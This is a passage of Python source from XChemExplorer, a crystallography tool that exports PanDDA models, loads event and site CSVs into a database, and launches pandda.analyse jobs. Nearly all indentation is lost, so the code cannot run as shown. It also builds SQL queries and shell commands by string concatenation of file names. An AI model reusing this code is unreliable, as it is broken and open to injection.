# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.initial_model_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
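    # decide which PanDDA models need to be exported by comparing the file timestamp of each
    # *-pandda-model.pdb with DatePanDDAModelCreated in the database; a model is (re-)exported
    # if the file is newer than the database entry, or if the user asked for 'all' models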
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
            self.Logfile.insert('Note: you chose to export ALL available PanDDA models!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
                        advice = ( 'The pandda model of '+sample+' was changed, but it was already refined! '
                                   'This is most likely because this was done with an older version of XCE. '
                                   'If you really want to export and refine this model, you need to open the database '
                                   'with DB Browser (sqlitebrowser.org); then change the RefinementOutcome field '
                                   'of the respective sample to "2 - PANDDA model", save the database and repeat the export procedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
self.Logfile.insert('changing directory to ' + os.path.join(self.initial_model_directory,sample))
os.chdir(os.path.join(self.initial_model_directory,sample))
self.Logfile.insert(sample + ': copying ' + os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
os.system('/bin/cp %s .' %os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
for old_event_map in glob.glob('*-BDC_*.ccp4'):
if not os.path.isdir('old_event_maps'):
os.mkdir('old_event_maps')
self.Logfile.warning(sample + ': moving ' + old_event_map + ' to old_event_maps folder')
os.system('/bin/mv %s old_event_maps' %old_event_map)
for event_map in glob.glob(os.path.join(self.panddas_directory,'processed_datasets',sample,'*-BDC_*.ccp4')):
self.Logfile.insert(sample + ': copying ' + event_map)
os.system('/bin/cp %s .' %event_map)
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
return samples_to_export
class run_pandda_export(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,update_datasource_only,which_models,pandda_params):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.update_datasource_only=update_datasource_only
self.which_models=which_models
self.already_exported_models=[]
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '' }
def run(self):
# v1.3.8.2 - removed option to update database only
# if not self.update_datasource_only:
samples_to_export=self.export_models()
self.import_samples_into_datasouce(samples_to_export)
# if not self.update_datasource_only:
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in samples_to_export: self.Logfile.insert(xtal)
# sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';")
# for item in sample_list:
# xtal=str(item[0])
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
            self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb')):
                    self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
try:
os.system('/bin/rm *-ensemble-model.pdb *restraints*')
except:
self.Logfile.error("Restraint files didn't exist to remove. Will try to continue")
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
Refine=XChemRefine.panddaRefine(self.initial_model_directory,xtal,compoundID,self.datasource)
os.symlink(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb'),xtal+'-ensemble-model.pdb')
Refine.RunQuickRefine(Serial,self.RefmacParams,self.external_software,self.xce_logfile,'pandda_refmac',None)
# elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures',
# '{}-pandda-model.pdb'.format(xtal)):
# self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) +
# ' does not have a modelled structure. Check whether you expect this dataset to ' +
# ' have a modelled structure, compare pandda.inspect and datasource,'
# ' then tell XCHEMBB ')
else:
self.Logfile.error('%s: cannot find %s-ensemble-model.pdb; cannot start refinement...' %(xtal,xtal))
self.Logfile.error('Please check terminal window for any PanDDA related tracebacks')
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
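    # parse pandda_inspect_sites.csv and pandda_inspect_events.csv and write one row per
    # site/event into the panddaTable; also flag in mainTable which datasets were used by
    # pandda and which ones are hits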
def import_samples_into_datasouce(self,samples_to_export):
# first make a note of all the datasets which were used in pandda directory
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'False',DimplePANDDApath='{0!s}' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
# do the same as before, but look for rejected datasets
try:
os.chdir(os.path.join(self.panddas_directory,'rejected_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'True',DimplePANDDApath='{0!s}',DimplePANDDAhit = 'False' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
except OSError:
pass
site_list = []
pandda_hit_list=[]
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_sites.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
            self.Logfile.insert('reading pandda_inspect_sites.csv')
for i,line in enumerate(csv_dict):
self.Logfile.insert(str(line).replace('\n','').replace('\r',''))
site_index=line['site_idx']
name=line['Name'].replace("'","")
comment=line['Comment']
site_list.append([site_index,name,comment])
                self.Logfile.insert('add to site_list: ' + str([site_index,name,comment]))
progress_step=1
for i,line in enumerate(open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))):
n_lines=i
if n_lines != 0:
progress_step=100/float(n_lines)
else:
progress_step=0
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('reading '+os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
for i,line in enumerate(csv_dict):
db_dict={}
sampleID=line['dtag']
if sampleID not in samples_to_export:
self.Logfile.warning('%s: not to be exported; will not add to panddaTable...' %sampleID)
continue
if sampleID not in pandda_hit_list:
pandda_hit_list.append(sampleID)
site_index=str(line['site_idx']).replace('.0','')
event_index=str(line['event_idx']).replace('.0','')
self.Logfile.insert(str(line))
self.Logfile.insert('reading {0!s} -> site {1!s} -> event {2!s}'.format(sampleID, site_index, event_index))
for entry in site_list:
if entry[0]==site_index:
site_name=entry[1]
site_comment=entry[2]
break
# check if EVENT map exists in project directory
event_map=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*ccp4')):
filename=file[file.rfind('/')+1:]
if filename.startswith(sampleID+'-event_'+event_index) and filename.endswith('map.native.ccp4'):
event_map=file
self.Logfile.insert('found respective event maps in {0!s}: {1!s}'.format(self.initial_model_directory, event_map))
break
# initial pandda model and mtz file
pandda_model=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*pdb')):
filename=file[file.rfind('/')+1:]
if filename.endswith('-ensemble-model.pdb'):
pandda_model=file
if sampleID not in self.already_exported_models:
self.already_exported_models.append(sampleID)
break
inital_mtz=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*mtz')):
filename=file[file.rfind('/')+1:]
if filename.endswith('pandda-input.mtz'):
inital_mtz=file
break
db_dict['CrystalName'] = sampleID
db_dict['PANDDApath'] = self.panddas_directory
db_dict['PANDDA_site_index'] = site_index
db_dict['PANDDA_site_name'] = site_name
db_dict['PANDDA_site_comment'] = site_comment
db_dict['PANDDA_site_event_index'] = event_index
db_dict['PANDDA_site_event_comment'] = line['Comment'].replace("'","")
db_dict['PANDDA_site_confidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_InspectConfidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_ligand_placed'] = line['Ligand Placed']
db_dict['PANDDA_site_viewed'] = line['Viewed']
db_dict['PANDDA_site_interesting'] = line['Interesting']
db_dict['PANDDA_site_z_peak'] = line['z_peak']
db_dict['PANDDA_site_x'] = line['x']
db_dict['PANDDA_site_y'] = line['y']
db_dict['PANDDA_site_z'] = line['z']
db_dict['PANDDA_site_ligand_id'] = ''
db_dict['PANDDA_site_event_map'] = event_map
db_dict['PANDDA_site_initial_model'] = pandda_model
db_dict['PANDDA_site_initial_mtz'] = inital_mtz
db_dict['PANDDA_site_spider_plot'] = ''
# find apo structures which were used
# XXX missing XXX
self.db.update_insert_site_event_panddaTable(sampleID,db_dict)
# this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement
self.db.execute_statement("update panddaTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and RefinementOutcome is null".format(sampleID))
self.db.execute_statement("update mainTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and (RefinementOutcome is null or RefinementOutcome is '1 - Analysis Pending')".format(sampleID))
self.db.execute_statement("update mainTable set DimplePANDDAhit = 'True' where CrystalName is '{0!s}'".format(sampleID))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('done reading pandda_inspect_events.csv')
# finally find all samples which do not have a pandda hit
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
self.Logfile.insert('check which datasets are not interesting')
# DimplePANDDAhit
# for xtal in glob.glob('*'):
# if xtal not in pandda_hit_list:
# self.Logfile.insert(xtal+': not in interesting_datasets; updating database...')
# self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA models!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
elif self.which_models == 'selected':
for i in range(0, self.pandda_analyse_data_table.rowCount()):
if str(self.pandda_analyse_data_table.item(i, 0).text()) == sample:
if self.pandda_analyse_data_table.cellWidget(i, 1).isChecked():
self.Logfile.insert('Dataset selected by user -> exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
break
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+sample+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DB Browser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export procedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pandda=' '
for sample in samples_to_export:
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pandda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
if os.path.isdir(os.path.join(self.panddas_directory,'rejected_datasets')):
Cmds = (
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string)+
' export_ligands=False'
' generate_occupancy_groupings=True\n'
)
else:
Cmds = (
'source /dls/science/groups/i04-1/software/pandda-update/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
# 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n'
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string_new_pandda)+
' generate_restraints=True\n'
)
self.Logfile.insert('running pandda.export with the following settings:\n'+Cmds)
os.system(Cmds)
return samples_to_export
class run_pandda_analyse(QtCore.QThread):
def __init__(self,pandda_params,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.submit_mode=pandda_params['submit_mode']
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.nproc=pandda_params['nproc']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.sort_event=pandda_params['sort_event']
self.number_of_datasets=pandda_params['N_datasets']
self.max_new_datasets=pandda_params['max_new_datasets']
self.grid_spacing=pandda_params['grid_spacing']
self.reference_dir=pandda_params['reference_dir']
self.filter_pdb=os.path.join(self.reference_dir,pandda_params['filter_pdb'])
self.wilson_scaling = pandda_params['perform_diffraction_data_scaling']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
self.appendix=pandda_params['appendix']
self.write_mean_maps=pandda_params['write_mean_map']
self.calc_map_by = pandda_params['average_map']
self.select_ground_state_model=''
projectDir = self.data_directory.replace('/*', '')
self.make_ligand_links='$CCP4/bin/ccp4-python %s %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),
'helpers',
'make_ligand_links_after_pandda.py')
,projectDir,self.panddas_directory)
self.use_remote = pandda_params['use_remote']
self.remote_string = pandda_params['remote_string']
if self.appendix != '':
self.panddas_directory=os.path.join(self.reference_dir,'pandda_'+self.appendix)
if os.path.isdir(self.panddas_directory):
os.system('/bin/rm -fr %s' %self.panddas_directory)
os.mkdir(self.panddas_directory)
if self.data_directory.startswith('/dls'):
self.select_ground_state_model = 'module load ccp4\n'
self.select_ground_state_model +='$CCP4/bin/ccp4-python %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),'helpers','select_ground_state_dataset.py'),self.panddas_directory)
self.make_ligand_links=''
def run(self):
# print self.reference_dir
# print self.filter_pdb
# how to run pandda.analyse on large datasets
#
# 1) Run the normal pandda command, with the new setting, e.g.
# pandda.analyse data_dirs=... max_new_datasets=500
# This will do the analysis on the first 500 datasets and build the statistical maps - just as normal.
#
# 2) Run pandda with the same command:
# pandda.analyse data_dirs=... max_new_datasets=500
# This will add 500 new datasets, and process them using the existing statistical maps
# (this will be quicker than the original analysis). It will then merge the results of the two analyses.
#
# 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal.
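#
# Illustrative sketch only (the numbers are assumptions, not taken from this run):
# with N_datasets=1200 and max_new_datasets=500 the loop below emits the same
# pandda.analyse command three times, i.e.
# pandda.analyse data_dirs=... out_dir=... max_new_datasets=500 (datasets 1-500, builds the statistical maps)
# pandda.analyse data_dirs=... out_dir=... max_new_datasets=500 (datasets 501-1000, reuses the maps)
# pandda.analyse data_dirs=... out_dir=... max_new_datasets=500 (datasets 1001-1200, merges the analyses)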
number_of_cycles=int(self.number_of_datasets)/int(self.max_new_datasets)
if int(self.number_of_datasets) % int(self.max_new_datasets) != 0: # modulo gives remainder after integer division
number_of_cycles+=1
self.Logfile.insert('will run %s rounds of pandda.analyse' %str(number_of_cycles))
if os.path.isfile(os.path.join(self.panddas_directory,'pandda.running')):
self.Logfile.insert('it looks as if a pandda.analyse job is currently running in: '+self.panddas_directory)
msg = ( 'there are three possibilities:\n'
'1.) choose another PANDDA directory\n'
'2.) - check if the job is really running either on the cluster (qstat) or on your local machine\n'
' - if so, be patient and wait until the job has finished\n'
'3.) same as 2., but instead of waiting, kill the job and remove at least the pandda.running file\n'
' (or all the contents in the directory if you want to start from scratch)\n' )
self.Logfile.insert(msg)
return None
else:
# if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
# source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n')
# elif os.getenv('SHELL') == '/bin/bash' or self.use_remote:
# source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n'
# source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n')
# else:
# source_file=''
# v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4
# 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete
# source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
source_file = ''
source_file += 'export XChemExplorer_DIR="' + os.getenv('XChemExplorer_DIR') + '"\n'
if os.path.isfile(self.filter_pdb + '.pdb'):
print('filter pdb located')
filter_pdb=' filter.pdb='+self.filter_pdb+'.pdb'
print('will use ' + filter_pdb + ' as a filter for pandda.analyse')
else:
if self.use_remote:
stat_command = self.remote_string.replace("qsub'", str('stat ' + self.filter_pdb + "'"))
output = subprocess.Popen(stat_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = output.communicate()
print out
if 'cannot stat' in out:
filter_pdb = ''
else:
filter_pdb = ' filter.pdb=' + self.filter_pdb + '.pdb'
else:
filter_pdb=''
os.chdir(self.panddas_directory)
# note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017)
dls = ''
if self.data_directory.startswith('/dls'):
dls = (
source_file +
'\n'
'module load pymol/1.8.2.0\n'
'\n'
'module load ccp4/7.0.072\n'
'\n'
)
Cmds = (
'#!'+os.getenv('SHELL')+'\n' +
'\n' +
dls +
'cd ' + self.panddas_directory + '\n' +
'\n'
)
ignore = []
char = []
zmap = []
for i in range(0, self.pandda_analyse_data_table.rowCount()):
ignore_all_checkbox = self.pandda_analyse_data_table.cellWidget(i, 7)
ignore_characterisation_checkbox = self.pandda_analyse_data_table.cellWidget(i, 8)
ignore_zmap_checkbox = self.pandda_analyse_data_table.cellWidget(i, 9)
if ignore_all_checkbox.isChecked():
ignore.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_characterisation_checkbox.isChecked():
char.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_zmap_checkbox.isChecked():
zmap.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
print ignore
def append_to_ignore_string(datasets_list, append_string):
if len(datasets_list)==0:
append_string = ''
for i in range(0, len(datasets_list)):
if i < len(datasets_list)-1:
append_string += str(datasets_list[i] + ',')
else:
append_string += str(datasets_list[i] +'"')
print(append_string)
return append_string
ignore_string = 'ignore_datasets="'
ignore_string = append_to_ignore_string(ignore, ignore_string)
char_string = 'exclude_from_characterisation="'
char_string = append_to_ignore_string(char, char_string)
zmap_string = 'exclude_from_z_map_analysis="'
zmap_string = append_to_ignore_string(zmap, zmap_string)
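# example of the strings built above (hypothetical dataset names): if 'x0001' and 'x0002'
# were ticked in the ignore column, ignore_string becomes ignore_datasets="x0001,x0002";
# an empty selection collapses the whole parameter to an empty string so it is omitted from the command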
for i in range(number_of_cycles):
Cmds += (
'pandda.analyse '+
' data_dirs="'+self.data_directory.replace('/*','')+'/*"'+
' out_dir="'+self.panddas_directory+'"'
' min_build_datasets='+self.min_build_datasets+
' max_new_datasets='+self.max_new_datasets+
' grid_spacing='+self.grid_spacing+
' cpus='+self.nproc+
' events.order_by='+self.sort_event+
filter_pdb+
' pdb_style='+self.pdb_style+
' mtz_style='+self.mtz_style+
' lig_style=/compound/*.cif'+
' apply_b_factor_scaling='+self.wilson_scaling+
' write_average_map='+self.write_mean_maps +
' average_map=' + self.calc_map_by +
' ' +
ignore_string +' '+
char_string +' '+
zmap_string +' '+
'\n'
)
Cmds += self.select_ground_state_model
Cmds += self.make_ligand_links
Cmds += '\n'
data_dir_string = self.data_directory.replace('/*', '')
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.cif" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
Cmds += '\n'
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.pdb" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
self.Logfile.insert('running pandda.analyse with the following command:\n'+Cmds)
f = open('pandda.sh','w')
f.write(Cmds)
f.close()
# #>>> for testing
# self.submit_mode='local machine'
self.Logfile.insert('trying to run pandda.analyse on ' + str(self.submit_mode))
if self.submit_mode=='local machine':
self.Logfile.insert('running PANDDA on local machine')
os.system('chmod +x pandda.sh')
os.system('./pandda.sh &')
elif self.use_remote:
# handles remote submission of pandda.analyse jobs
submission_string = self.remote_string.replace("qsub'",
str('cd ' +
self.panddas_directory +
'; ' +
"qsub -P labxchem -q medium.q -N pandda 5 -l exclusive,m_mem_free=100G pandda.sh'"))
os.system(submission_string)
self.Logfile.insert(str('running PANDDA remotely, using: ' + submission_string))
else:
self.Logfile.insert('running PANDDA on cluster, using qsub...')
os.system('qsub -P labxchem -q medium.q -N pandda -l exclusive,m_mem_free=100G pandda.sh')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class giant_cluster_datasets(QtCore.QThread):
def __init__(self,initial_model_directory,pandda_params,xce_logfile,datasource,):
QtCore.QThread.__init__(self)
self.panddas_directory=pandda_params['out_dir']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(datasource)
def run(self):
self.emit(QtCore.SIGNAL('update_progress_bar'), 0)
if self.pdb_style.replace(' ','') == '':
self.Logfile.insert('PDB style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'PDB style is not set in pandda.analyse!')
return None
if self.mtz_style.replace(' ','') == '':
self.Logfile.insert('MTZ style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'MTZ style is not set in pandda.analyse!')
return None
# 1.) prepare output directory
os.chdir(self.panddas_directory)
if os.path.isdir('cluster_analysis'):
self.Logfile.insert('removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.system('/bin/rm -fr cluster_analysis 2> /dev/null')
self.Logfile.insert('creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.mkdir('cluster_analysis')
self.emit(QtCore.SIGNAL('update_progress_bar'), 10)
# 2.) go through project directory and make sure that all pdb files really exist
# broken links derail the giant.cluster_mtzs_and_pdbs script
self.Logfile.insert('cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
